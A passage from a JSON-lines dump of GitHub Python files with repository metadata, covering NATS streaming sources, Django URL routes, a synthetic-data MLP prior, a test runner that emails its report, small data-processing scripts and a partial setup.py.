),\n html.Div(\n [\n html.Hr(),\n html.Footer(\n \"© Laboratory of Molecular Simulation (LSMO), École polytechnique fédérale de Lausanne (EPFL)\"\n ),\n ],\n className=\"container\",\n ),\n ],\n className=\"container\",\n # tag for iframe resizer\n **{\"data-iframe-height\": \"\"},\n)\n","repo_name":"kjappelbaum/colorjeopardy","sub_path":"colorjeopardy/app_complete.py","file_name":"app_complete.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"34244966298","text":"\"\"\"\nCreate custom streamz sources.\n\nClasses:\n\n from_nats\n\"\"\"\nimport asyncio\nimport inspect\nfrom typing import Callable, Union\n\nimport nats\nfrom nats.aio.msg import Msg\nfrom streamz import Source, Stream\n\n\n@Stream.register_api(staticmethod)\nclass from_nats(Source): # pylint: disable=C0103\n \"\"\" Accepts messages from nats\n\n Examples\n --------\n >>> import nats\n >>> from streamz import Stream\n >>> s = Stream.from_nats(\n ... 
'nats://localhost:4222',\n ... ['my-topic'],\n ... )\n >>> decoder = s.map(lambda x: x.decode())\n >>> L = decoder.sink_to_list()\n \"\"\"\n def __init__(\n self,\n servers: Union[str, list[str]],\n topics: Union[str, list[str]],\n callback: Union[Callable, None] = None,\n poll_interval: float = 0.1,\n **kwargs):\n self.servers = servers\n if isinstance(topics, list):\n self.topics: str = '|'.join(topics)\n else:\n self.topics = topics\n if callback is None:\n callback = self._process_message\n self._cb = callback\n self.poll_interval = poll_interval\n\n sig_stream = set(inspect.signature(Stream).parameters)\n sig_source = set(inspect.signature(Source).parameters)\n streamz_kwargs = {k: v for (k, v) in kwargs.items()\n if (k in sig_stream) or (k in sig_source)}\n self.kwargs = {k: v for (k, v) in kwargs.items()\n if (k not in sig_stream) and (k not in sig_source)}\n super().__init__(**streamz_kwargs)\n\n async def _process_message(self, message):\n self.emit(message.data.decode(), asynchronous=True)\n\n async def _run(self):\n # # Opt 1. With coroutine\n # # Will not return any message until max_msgs is reached\n # while True:\n # try:\n # self.consumer = await self.client.subscribe(\n # self.topics, max_msgs=5)\n # tasks = [self._cb(msg)\n # async for msg in self.consumer.messages]\n # # These three options seem to be equivalent\n # # await asyncio.gather(*tasks, return_exceptions=True)\n # # Should raise timeout error when all the tasks are not done\n # await asyncio.wait_for(\n # asyncio.gather(\n # *tasks, return_exceptions=True),\n # timeout=self.poll_interval)\n # # Should not raise timeout error and split the tasks\n # await asyncio.wait(tasks, timeout=self.poll_interval)\n # logging.info(\"done\")\n # except asyncio.TimeoutError:\n # logging.info(\"timeout\")\n # break\n # # Opt 2.a Without coroutine in while loop\n # # Will return messages if they arrive in time\n # self.sub = await self.client.subscribe(\n # self.topics,\n # cb=self._cb)\n # await asyncio.sleep(self.poll_interval)\n # # Will deliver remaining messages\n # await self.sub.drain()\n # # # Will not deliver remaining messages\n # # await self.sub.unsubscribe()\n # # logging.info(\"done\")\n # Opt 3. Synchronous\n async for msg in self.sub.messages:\n await self._cb(msg)\n await asyncio.sleep(self.poll_interval)\n\n async def run(self):\n self.client = await nats.connect(self.servers, **self.kwargs)\n # # Opt 2.b Without coroutine out of loop - will return all messages\n # self.sub = await self.client.subscribe(\n # self.topics,\n # cb=self._cb)\n # while not self.stopped:\n # await asyncio.sleep(self.poll_interval)\n # # Opt 2.a Without coroutine in while loop\n # while not self.stopped:\n # await self._run()\n # Opt 3. Synchronous\n self.sub = await self.client.subscribe(self.topics)\n while not self.stopped:\n await self._run()\n\n # TODO: drain client on stop\n # async def _stop(self):\n # await self.sub.unsubscribe()\n # await self.client.drain()\n\n # def stop(self):\n # \"\"\"set self.stopped, which will cause polling to stop after next run\n # \"\"\"\n # if not self.stopped:\n # asyncio.run(self._stop())\n # self.stopped = True\n\n\n@Stream.register_api(staticmethod)\nclass from_jetstream(Source): # pylint: disable=C0103\n \"\"\" Accepts messages from jetstream\n\n Examples\n --------\n >>> import nats\n >>> from streamz import Stream\n >>> s = Stream.from_jetstream(\n ... 'nats://localhost:4222',\n ... ['my-topic'],\n ... 'test_subscription'\n ... 
)\n >>> decoder = s.map(lambda x: x.decode())\n >>> L = decoder.sink_to_list()\n \"\"\"\n def __init__(\n self,\n servers: Union[str, list[str]],\n topics: Union[str, list[str]],\n subscription_name: str,\n callback: Union[Callable, None] = None,\n poll_interval: float = 0.1,\n **kwargs):\n self.servers = servers\n if isinstance(topics, list):\n self.topics: str = '|'.join(topics)\n else:\n self.topics = topics\n self.subscription_name = subscription_name\n if callback is None:\n callback = self._process_msg\n self._cb = callback\n self.poll_interval = poll_interval\n\n sig_stream = set(inspect.signature(Stream).parameters)\n sig_source = set(inspect.signature(Source).parameters)\n streamz_kwargs = {k: v for (k, v) in kwargs.items()\n if (k in sig_stream) or (k in sig_source)}\n self.kwargs = {k: v for (k, v) in kwargs.items()\n if (k not in sig_stream) and (k not in sig_source)}\n super().__init__(**streamz_kwargs)\n\n async def _process_msg(self, msg: Msg):\n try:\n self.emit(msg, asynchronous=True)\n await msg.ack()\n except Exception: # pragma: no cover\n await msg.nak()\n\n async def _run(self):\n try:\n msgs = await self.sub.fetch(1)\n for msg in msgs:\n await self._cb(msg)\n except TimeoutError: # pragma: no cover\n pass\n finally:\n await asyncio.sleep(self.poll_interval)\n\n async def run(self):\n self.nc = await nats.connect(self.servers, **self.kwargs)\n self.client = self.nc.jetstream()\n self.sub = await self.client.pull_subscribe(\n self.topics, durable=self.subscription_name)\n while not self.stopped:\n await self._run()\n","repo_name":"MarekWadinger/streamz_nats","sub_path":"streamz_nats/sources.py","file_name":"sources.py","file_ext":"py","file_size_in_byte":6757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41795320076","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\ndef get_label_length_and_num(L, N):\n length, summary = 0, 0\n\n for i in range(1, 51):\n prev_sum = summary\n summary += len(L) ** i\n length = i\n if (summary >= N):\n break\n\n return length, (N - prev_sum)\n\ndef solve():\n L, N = input().split(' ')\n N = int(N)\n label_length, n = get_label_length_and_num(L, N)\n last_n = n\n ans = list(L[0] * label_length)\n mod = n % len(L)\n\n ans[0] = L[mod-1] if mod else L[-1]\n\n if label_length < 2:\n return ''.join(reversed(ans))\n\n for i in range(label_length-1, 0, -1):\n for j in range(1, len(L)+1):\n if (len(L) ** i) * j < last_n:\n continue\n ans[i] = L[j-1]\n break\n last_n -= (len(L) ** i) * (j - 1)\n\n return ''.join(reversed(ans))\n\ndef main():\n T = int(input())\n for i in range(T):\n print('Case #{i}: {answer}'.format(i=i+1, answer=solve()))\n\nif __name__ == '__main__':\n main()\n","repo_name":"changyuheng/hacker-cup-solutions","sub_path":"2014/round-1/labelmaker.py","file_name":"labelmaker.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22804546758","text":"import numpy as np\r\n\r\ndef window(image,window_size=(64,64),x_step=0.5,y_step=0.05,x_range=(0,1),y_range=(0,1),scale=1.5):\r\n windows=[]\r\n h,w=np.array(image).shape[:2]\r\n \r\n for y in range(int(y_range[0]*h), int(y_range[1]*h),int(y_step*h)):\r\n win_width =int(window_size[1] + scale * (y-(y_range[0]*h)))\r\n win_height = int(window_size[0] + scale * (y-(y_range[0]*h)))\r\n \r\n if y+win_height >int (y_range[1]*h) or win_width > w:\r\n break\r\n \r\n x_steps = int(x_step*win_width)\r\n for x in 
range(int(x_range[0]*w), int(x_range[1]*w) - win_width + x_steps , x_steps):\r\n windows.append((x , y , x + win_width , y + win_height))\r\n \r\n \r\n return np.array(windows)\r\n","repo_name":"around-star/Car-Detection","sub_path":"sliding_windows.py","file_name":"sliding_windows.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32802563909","text":"\"\"\"DaftarProject URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom Daftar import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('register/', views.user_register, name=\"register\"),\n path('login/', views.user_login, name=\"login\"),\n path('logout/', views.userlogout, name='logout'),\n path('create_profile/', views.create_profile, name='create_profile'),\n path('profile_page/', views.profile_page, name='profile_page'),\n path('create_post//', views.create_post, name='create_post'),\n path('search_user/', views.search_user, name='search_user'),\n path('follow//', views.follow_user, name=\"follow-button\"),\n path('followers_page//', views.followers_page, name='followers_page'),\n path('following_page//', views.following_page, name='following_page'),\n path('user_profile//', views.user_profile, name='user_profile'),\n path('feed_page//', views.feed_page, name='feed_page'),\n]\n\nif settings.DEBUG:\n urlpatterns+=static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns+=static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"DesertDemons/Daftar","sub_path":"DaftarProject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7170788797","text":"import scipy\nimport scipy.cluster.hierarchy as sch\nimport numpy as np\nimport matplotlib.pylab as plt\n\n#X = scipy.randn(1001,2)\nharris = np.load('harrisresponse1.npy')\nvar = np.load('vargrads1.npy')\n\n\nX = []\n\nfor i in range(len(harris)):\n X.append([harris[i], var[i]])\nd = sch.distance.pdist(X)\n\nZ= sch.linkage(d,method='complete')\n\nP =sch.dendrogram(Z)\n\nT = sch.fcluster(Z, 0.5*d.max(), 'distance')\n#array([4, 5, 3, 2, 2, 3, 5, 2, 2, 5, 2, 2, 2, 3, 2, 3, 2, 5, 4, 5, 2, 5, 2,\n# 3, 3, 3, 1, 3, 4, 2, 2, 4, 2, 4, 3, 3, 2, 5, 5, 5, 3, 2, 2, 2, 5, 4,\n# 2, 4, 2, 2, 5, 5, 1, 2, 3, 2, 2, 5, 4, 2, 5, 4, 3, 5, 4, 4, 2, 2, 2,\n# 4, 2, 5, 2, 2, 3, 3, 2, 4, 5, 3, 4, 4, 2, 1, 5, 4, 2, 2, 5, 5, 2, 2,\n# 5, 5, 5, 4, 3, 3, 2, 4], dtype=int32)\n\nsch.leaders(Z,T)\n# (array([190, 191, 182, 193, 194], dtype=int32),\n# array([2, 3, 1, 4,5],dtype=int32))\n\ndef plot_tree(P, pos=None):\n plt.clf()\n icoord = scipy.array(P['icoord'])\n dcoord = scipy.array(P['dcoord'])\n color_list = scipy.array(P['color_list'])\n 
print(len(color_list))\n xmin, xmax = icoord.min(), icoord.max()\n ymin, ymax = dcoord.min(), dcoord.max()\n if pos:\n icoord = icoord[pos]\n dcoord = dcoord[pos]\n color_list = color_list[pos]\n fig, ax = plt.subplots()\n\n for xs, ys, color in zip(icoord, dcoord, color_list):\n ax.plot(xs, ys, color)\n\n\n ax.set_xlabel('Weighted Average of Harris Response Function')\n ax.set_ylabel('Height')\n ax.set_title('Agglomerative Hierarchical Cluster Dendogram')\n plt.show()\n\n\n \nplot_tree(P)","repo_name":"siddharthbharthulwar/Synthetic-Vision-System","sub_path":"Pipeline/hierarchy.py","file_name":"hierarchy.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"39950988824","text":"from django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path('api/follow/', views.FollowAndUnfollow),\n path('api/follow-read/', views.FollowPhotoRead),\n path('api/follow-latest-photo', views.FollowingLatestPhoto),\n path('api/sign-up/', views.SignUp),\n path('api/sign-in/', views.SignIn),\n path('api/recipe-favorite/', views.RecipeFavorites)\n]","repo_name":"pgw928/DjangoRestFramework","sub_path":"user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2078696625","text":"import random\n\nimport torch\nfrom torch import nn\n\nimport numpy as np\n\nfrom utils import default_device\nfrom .utils import get_batch_to_dataloader\nfrom .utils import order_by_y, normalize_data, normalize_by_used_features_f, Binarize\nfrom .utils import trunc_norm_sampler_f, beta_sampler_f, gamma_sampler_f, uniform_sampler_f, zipf_sampler_f, scaled_beta_sampler_f, uniform_int_sampler_f\n\n\ndef canonical_pre_processing(x, canonical_args):\n assert x.shape[2] == len(canonical_args)\n ranges = [torch.arange(num_classes).float() if num_classes is not None else None for num_classes in canonical_args]\n for feature_dim, rang in enumerate(ranges):\n if rang is not None:\n x[:, :, feature_dim] = (x[:, :, feature_dim] - rang.mean()) / rang.std()\n return x\n\n\nDEFAULT_NUM_LAYERS = 2\nDEFAULT_HIDDEN_DIM = 100\nDEFAULT_ACTIVATION_MODULE = torch.nn.ReLU\nDEFAULT_INIT_STD = .1\nDEFAULT_HIDDEN_NOISE_STD = .1\nDEFAULT_FIXED_DROPOUT = 0.\nDEFAULT_IS_BINARY_CLASSIFICATION = False\n\n\nclass GaussianNoise(nn.Module):\n def __init__(self, std):\n super().__init__()\n self.std = std\n\n def forward(self, x):\n return x + torch.normal(torch.zeros_like(x), self.std)\n\n\ndef causes_sampler_f(num_causes_sampler):\n num_causes = num_causes_sampler()\n means = np.random.normal(0, 1, (num_causes))\n std = np.abs(np.random.normal(0, 1, (num_causes)) * means)\n return means, std\n\ndef categorical_features_sampler(max_features):\n features = []\n ordinal = []\n num_categorical_features_sampler = scaled_beta_sampler_f(0.5, .8, max_features, 0)\n is_ordinal_sampler = lambda : random.choice([True, False])\n classes_per_feature_sampler = scaled_beta_sampler_f(0.1, 2.0, 10, 1)\n classes_per_feature_sampler_ordinal = scaled_beta_sampler_f(0.1, 2.0, 200, 1)\n for i in range(0, num_categorical_features_sampler()):\n ordinal_s = is_ordinal_sampler()\n ordinal.append(ordinal_s)\n classes = classes_per_feature_sampler_ordinal() if ordinal_s else classes_per_feature_sampler()\n features.append(np.random.rand(classes))\n return features, ordinal\n\n\ndef get_batch(batch_size, seq_len, num_features, device=default_device, 
hyperparameters=(DEFAULT_NUM_LAYERS, DEFAULT_HIDDEN_DIM, DEFAULT_ACTIVATION_MODULE, DEFAULT_INIT_STD, DEFAULT_HIDDEN_NOISE_STD, DEFAULT_FIXED_DROPOUT, DEFAULT_IS_BINARY_CLASSIFICATION),\n batch_size_per_gp_sample=None, num_outputs=1, canonical_args=None, sampling='normal'):\n assert num_outputs == 1\n num_layers_sampler, hidden_dim_sampler, activation_module, init_std_sampler, noise_std_sampler, dropout_prob_sampler, is_binary_classification, num_features_used_sampler, causes_sampler, is_causal, pre_sample_causes, pre_sample_weights, y_is_effect, order_y, normalize_by_used_features, categorical_features_sampler, nan_prob = hyperparameters\n\n # if is_binary_classification:\n # sample_batch_size = 100*batch_size\n # else:\n sample_batch_size = batch_size\n\n # if canonical_args is not None:\n # assert len(canonical_args) == num_causes\n # # should be list of [None, 2, 4] meaning scalar parameter, 2 classes, 4 classes\n #\n # for feature_idx, num_classes in enumerate(canonical_args):\n # if num_classes is not None:\n # causes[:,:,feature_idx] = torch.randint(num_classes, (seq_len, sample_batch_size))\n #\n # causes = canonical_pre_processing(causes, canonical_args)\n\n batch_size_per_gp_sample = batch_size_per_gp_sample or sample_batch_size // 8\n assert sample_batch_size % batch_size_per_gp_sample == 0, 'Please choose a batch_size divisible by batch_size_per_gp_sample.'\n num_models = sample_batch_size // batch_size_per_gp_sample\n # standard kaiming uniform init currently...\n\n def get_model():\n class MLP(torch.nn.Module):\n def __init__(self):\n super(MLP, self).__init__()\n\n self.dropout_prob = dropout_prob_sampler()\n self.noise_std = noise_std_sampler()\n self.init_std = init_std_sampler()\n self.num_features_used = num_features_used_sampler()\n self.categorical_features, self.categorical_features_is_ordinal = categorical_features_sampler(self.num_features_used)\n if is_causal:\n self.causes = causes_sampler() if is_causal else self.num_features_used\n self.causes = (torch.tensor(self.causes[0], device=device).unsqueeze(0).unsqueeze(0).tile((seq_len,1,1)), torch.tensor(self.causes[1], device=device).unsqueeze(0).unsqueeze(0).tile((seq_len,1,1)))\n self.num_causes = self.causes[0].shape[2]\n else:\n self.num_causes = self.num_features_used\n self.num_layers = num_layers_sampler()\n self.hidden_dim = hidden_dim_sampler()\n\n if is_causal:\n self.hidden_dim = max(self.hidden_dim, 2 * self.num_features_used+1)\n\n #print('cat', self.categorical_features, self.categorical_features_is_ordinal, self.num_features_used)\n\n assert(self.num_layers > 2)\n\n self.layers = [nn.Linear(self.num_causes, self.hidden_dim, device=device)]\n self.layers += [module for layer_idx in range(self.num_layers-1) for module in [\n nn.Sequential(*[\n activation_module()\n , nn.Linear(self.hidden_dim, num_outputs if layer_idx == self.num_layers - 2 else self.hidden_dim, device=device)\n , GaussianNoise(torch.abs(torch.normal(torch.zeros((num_outputs if layer_idx == self.num_layers - 2 else self.hidden_dim),device=device), self.noise_std))) if pre_sample_weights else GaussianNoise(self.noise_std)\n ])\n ]]\n self.layers = nn.Sequential(*self.layers)\n\n self.binarizer = Binarize() if is_binary_classification else lambda x : x\n\n # Initialize Model parameters\n for i, p in enumerate(self.layers.parameters()):\n dropout_prob = self.dropout_prob if i > 0 else 0.0\n nn.init.normal_(p, std=self.init_std / (1. - dropout_prob))\n with torch.no_grad():\n p *= torch.bernoulli(torch.zeros_like(p) + 1. 
- dropout_prob)\n\n def forward(self):\n if sampling == 'normal':\n if is_causal and pre_sample_causes:\n causes = torch.normal(self.causes[0], self.causes[1].abs()).float()\n else:\n causes = torch.normal(0., 1., (seq_len, 1, self.num_causes), device=device).float()\n elif sampling == 'uniform':\n causes = torch.rand((seq_len, 1, self.num_causes), device=device)\n else:\n raise ValueError(f'Sampling is set to invalid setting: {sampling}.')\n\n outputs = [causes]\n for layer in self.layers:\n outputs.append(layer(outputs[-1]))\n outputs = outputs[2:]\n\n if is_causal:\n outputs_flat = torch.cat(outputs, -1)\n random_perm = torch.randperm(outputs_flat.shape[-1]-1, device=device)\n random_idx_y = [-1] if y_is_effect else random_perm[0:num_outputs]\n y = outputs_flat[:, :, random_idx_y]\n\n random_idx = random_perm[num_outputs:num_outputs + self.num_features_used]\n x = outputs_flat[:, :, random_idx]\n else:\n y = outputs[-1][:, :, :]\n x = causes\n\n if len(self.categorical_features) > 0:\n random_perm = torch.randperm(x.shape[-1], device=device)\n for i, (categorical_feature, is_ordinal) in enumerate(zip(self.categorical_features, self.categorical_features_is_ordinal)):\n idx = random_perm[i]\n temp = normalize_data(x[:, :, idx])\n if is_ordinal:\n x[:, :, idx] = (temp > (torch.tensor(categorical_feature, device=device, dtype=torch.float32).unsqueeze(-1).unsqueeze(-1) - 0.5)).sum(axis=0)\n else:\n x[:, :, idx] = (temp > (torch.tensor(categorical_feature, device=device,\n dtype=torch.float32).unsqueeze(-1).unsqueeze(-1) - 0.5)).sum(\n axis=0) * (127 * len(categorical_feature) + 1) % len(categorical_feature)\n\n\n # if nan_prob > 0:\n # nan_value = random.choice([-999,-1,0, -10])\n # x[torch.rand(x.shape, device=device) > (1-nan_prob)] = nan_value\n\n x, y = normalize_data(x), normalize_data(y)\n\n # Binarize output if enabled\n y = self.binarizer(y)\n\n if normalize_by_used_features:\n x = normalize_by_used_features_f(x, self.num_features_used, num_features)\n\n if is_binary_classification and order_y:\n x, y = order_by_y(x,y)\n\n # Append empty features if enabled\n x = torch.cat([x, torch.zeros((x.shape[0], x.shape[1], num_features - self.num_features_used), device=device)], -1)\n\n return x, y\n\n return MLP()\n\n models = [get_model() for _ in range(num_models)]\n\n sample = sum([[model() for _ in range(0,batch_size_per_gp_sample)] for model in models],[])\n\n x, y = zip(*sample)\n y = torch.cat(y, 1).squeeze(-1).detach()\n x = torch.cat(x, 1).detach()\n\n return x, y, y\n\n\nDataLoader = get_batch_to_dataloader(get_batch)\nDataLoader.num_outputs = 1\n\n","repo_name":"automl/TransformersCanDoBayesianInference","sub_path":"priors/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":9866,"program_lang":"python","lang":"en","doc_type":"code","stars":141,"dataset":"github-code","pt":"72"} +{"seq_id":"26368546674","text":"import smtplib # mail service\nfrom email.mime.text import MIMEText # email body template\nimport unittest\nfrom Utils.HTMLTestRunner import HTMLTestRunner\nimport time,os\nfrom email.mime.multipart import MIMEMultipart # email attachment support\nfrom email.header import Header # email header template\nimport configparser\nfrom Utils.page import *\n# function that sends the report email\ndef send_mail(file_new):\n f = open(file_new,'rb')\n mail_body = f.read()\n f.close()\n # basic connection info\n smtpserver = Helper().readConfig()[0]\n pwd = Helper().readConfig()[1]\n # define the email subject\n msg = MIMEMultipart()\n msg['subject']=Header(Helper().readConfig()[-1],'utf-8')\n msg['from'] = Helper().readConfig()[3]\n msg['to'] =Helper().readConfig()[4]\n body = 
MIMEText(mail_body,\"base64\",\"utf-8\")\n msg.attach(body)\n att = MIMEText(mail_body,'base64','utf-8')\n att['Content-Type'] =\"application/octet-stream\"\n att['Content-Disposition'] ='attachment;filename=\"Interface_report.html\"'\n msg.attach(att)\n # connect to the mail server and send the message\n smtp = smtplib.SMTP()\n smtp.connect(smtpserver)\n smtp.login(msg['from'],pwd)\n smtp.sendmail(msg['from'],msg['to'],msg.as_string())\n print(\"Mail sent successfully\")\n # find the most recent report file\ndef new_file(test_dir):\n result_dir = test_dir\n # list all files under the test report directory\n lists = os.listdir(result_dir)\n lists.sort() # sort\n file = [x for x in lists if x.endswith('.html')]\n file_path = os.path.join(result_dir,file[-1])\n return file_path\n\nif __name__ == '__main__':\n base_dir = os.path.dirname(os.path.realpath(__file__))\n test_dir = os.path.join(base_dir,'testCases')\n test_report = os.path.join(base_dir,'Reports')\n testlist = unittest.defaultTestLoader.discover(test_dir,pattern='test*.py')\n now = time.strftime(\"%Y-%m-%d %H_%M_%S\")\n filename = test_report+'\\\\'+now +'result.html'\n fp = open(filename,'wb')\n runner = HTMLTestRunner(\n stream=fp,\n title=u'Interface automation framework test report',\n description=u'System environment: win10'\n )\n runner.run(testlist)\n fp.close()\n new_report = new_file(test_report)\n send_mail(new_report)","repo_name":"tobyyu/interface_master","sub_path":"TestAPI/runAll.py","file_name":"runAll.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"752311514","text":"import pandas as pd\n\n\ndef process_ranking(file_name):\n # file_name = 'raw_data/stu_base.csv'\n\n file = pd.read_csv(file_name, encoding='gbk')\n\n file.columns = [x[1:-1] for x in file.columns]\n\n ranking = pd.DataFrame()\n ranking[\"uid\"] = file[\"i\"]\n ranking[\"ranking_absolu\"] = 1 / (file[\"ranking\"] / file[\"pro_stu_num\"])\n ranking[\"ranking\"] = file[\"ranking\"]\n\n ranking.to_csv(\"processed_data/ranking.csv\")","repo_name":"RongYangRosie/Evaluation-Algorithm-of-Bachelors-Learning-Ability","sub_path":"Deep Learning Models/scripts/process_ranking.py","file_name":"process_ranking.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43856336210","text":"import glob\nimport os\nimport numpy as np\nimport shutil\nfrom tqdm import tqdm \nfrom PIL import Image\nimport tool\nimport os.path\nfrom sys import argv\n\nloop_id = argv[1]\ncomp_id = argv[2]\nfor comp in range(3):\n if comp ==0:\n comp_id='3a'\n data_from_dir = './3adata'+str(int(loop_id))+'/data'+str(int(loop_id))+'/train/'\n if comp ==1:\n comp_id='3b'\n data_from_dir = './3bdata'+str(int(loop_id))+'/data'+str(int(loop_id))+'/train/'\n if comp ==2:\n comp_id='3c'\n data_from_dir = './3cdata'+str(int(loop_id))+'/data'+str(int(loop_id))+'/train/'\n input_namelist = glob.glob(data_from_dir+ 'input/*.png')\n count =0 \n for path in tqdm(input_namelist):\n label_name = (path[:-4] + '.png').replace('input', 'label')\n if os.path.isfile(label_name) == False:\n count +=1\n os.remove(path) \nfor comp in range(3):\n if comp ==0:\n comp_id='3a'+str(int(loop_id))+'r'\n data_from_dir = './3adata'+str(int(loop_id))+'/data'+str(int(loop_id))+'/train/'\n if comp ==1:\n comp_id='3b'+str(int(loop_id))+'r'\n data_from_dir = './3bdata'+str(int(loop_id))+'/data'+str(int(loop_id))+'/train/'\n if comp ==2:\n comp_id='3c'+str(int(loop_id))+'r'\n data_from_dir = './3cdata'+str(int(loop_id))+'/data'+str(int(loop_id))+'/train/' \n \n input_namelist = 
glob.glob(data_from_dir+ 'input/*.png')\n label_namelist=[]\n for path in input_namelist:\n label_name = (path[:-4] + '.png').replace('input', 'label')\n label_namelist.append(label_name)\n \n scene_num = int(len(input_namelist)/12)\n \n \n yaw_times = 6\n rot_step_size = 360 / yaw_times\n y_ws = np.array([rot_step_size * i for i in range(yaw_times)]).tolist()\n ap_ws = [0, 1, 2, 3]\n p_ws = [0,10,20]\n r_ws = [0,-10,10]\n fl_ws = [0,1,2,3]\n \n image_save_dir = './tmp_data/input/'\n label_save_dir = './tmp_data/label/'\n tool.create_dir_not_exist(image_save_dir)\n tool.create_dir_not_exist(label_save_dir)\n \n for i in tqdm(range(scene_num)):\n tmp_new_label = np.ones(240*240*144,dtype=int).reshape(240,240,144)*255\n tmp_need_move_filename = '' \n for yt in y_ws: \n index = 0\n for pt in p_ws:\n for rt in r_ws:\n for ap_ind in ap_ws:\n for fl_ind in fl_ws:\n search_labelname = data_from_dir+'label/'+str(comp_id)+'num_'+str(int(i))+'_yaw_'+str(int(yt)) \\\n +'_ap_'+str(int(ap_ind))+'_pitch_'+str(int(pt)) \\\n +'_roll_'+str(int(rt))+'_fl_'+str(int(fl_ind))+'.png'\n if os.path.exists(search_labelname) == True:\n tmp_new_label[:,:,index] = np.asarray(Image.open(search_labelname))\n np.save(label_save_dir+comp_id+'_'+str(int(i))+'_yaw_'+str(int(yt))+'.npy',tmp_new_label.astype(np.uint8))\n # print(np.sum(tmp_new_label))\n search_imagename = data_from_dir+'input/'+str(comp_id)+'num_'+str(int(i))+'_yaw_'+str(int(yt)) \\\n +'_ap_'+str(int(ap_ind))+'_pitch_'+str(int(pt)) \\\n +'_roll_'+str(int(rt))+'_fl_'+str(int(fl_ind))+'.png'\n \n if os.path.exists(search_imagename) == True:\n tmp_need_move_filename = search_imagename\n shutil.copy(tmp_need_move_filename, image_save_dir+comp_id+'_'+str(int(i))+'_yaw_'+str(int(yt))+'.png')\n \n index+=1\n \n \n \n \n \n \n\n\n ","repo_name":"HKUST-RML/Learning-to-Grasp-by-Digging","sub_path":"arrange_data.py","file_name":"arrange_data.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"}
+{"seq_id":"73286429353","text":"#!/usr/bin/env python\nimport zlib\nimport sys\n\ndata_file = sys.argv[1]\n\ndata = open(data_file, \"r\").read()\ncompressed = zlib.compress(data.encode(\"utf8\"))\n\nwrfd = open(data_file + \".compressed\", \"wb\")\nwrfd.write(compressed)\nwrfd.close()\nprint(\"Data {} compressed to {}\".format(data_file, data_file + \".compressed\"))\n","repo_name":"NextGenerationHackers/HTML5-Tools","sub_path":"e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"72393034152","text":"input = __import__('sys').stdin.readline\nimport heapq\n\ndef to_int(time):\n time = time.replace('.', '')\n time = time.split(':')\n val = int(time[0]) * 3600 * 1000 + int(time[1]) * 60 *1000 + int(time[2])\n return val\n\nn = int(input())\nheap = []\nfor _ in range(n):\n st, ed = input().split()\n st, ed = to_int(st), to_int(ed)\n heap.append((st, 1))\n heap.append((ed, 0))\n\nheapq.heapify(heap)\nans = 0\ncur = 0\nwhile heap:\n ti, fl = heapq.heappop(heap)\n if fl == 0:\n cur -= 1\n else:\n cur += 1\n ans = max(ans, cur)\nprint(ans)","repo_name":"112224/algorithm","sub_path":"python3/22867 종점.py","file_name":"22867 종점.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"19448839098","text":"# License AGPLv3 (http://www.gnu.org/licenses/agpl-3.0-standalone.html)\nimport os\nimport 
setuptools\n\n\nhere = os.path.dirname(os.path.abspath(__file__))\nwith open(os.path.join(here, 'README.md')) as f:\n long_description = f.read()\n\n\nsetuptools.setup(\n name='oca-maintainers-tools',\n author='Odoo Community Association (OCA)',\n description='Set of tools to help managing Odoo Community projects',\n long_description=long_description,\n license='AGPL3',\n packages=['tools'],\n include_package_data=True,\n use_scm_version=True,\n setup_requires=[\n 'setuptools_scm',\n ],\n install_requires=[\n 'appdirs',\n 'argparse',\n 'autopep8',\n 'click',\n 'configparser', # for python2 compat\n # We need to pin docutils version, see\n # https://github.com/OCA/maintainer-tools/issues/423\n # Consider carefully before changing this.\n 'docutils>=0.15.1,<0.15.1.1',\n 'ERPpeek',\n 'github3.py>=1',\n 'inflection',\n 'jinja2',\n 'PyYAML',\n 'polib',\n 'pygments',\n 'requests',\n 'toml>=0.10.0', # for oca-towncrier\n 'towncrier>=19.2', # for oca-towncrier\n 'twine',\n 'wheel',\n ],\n 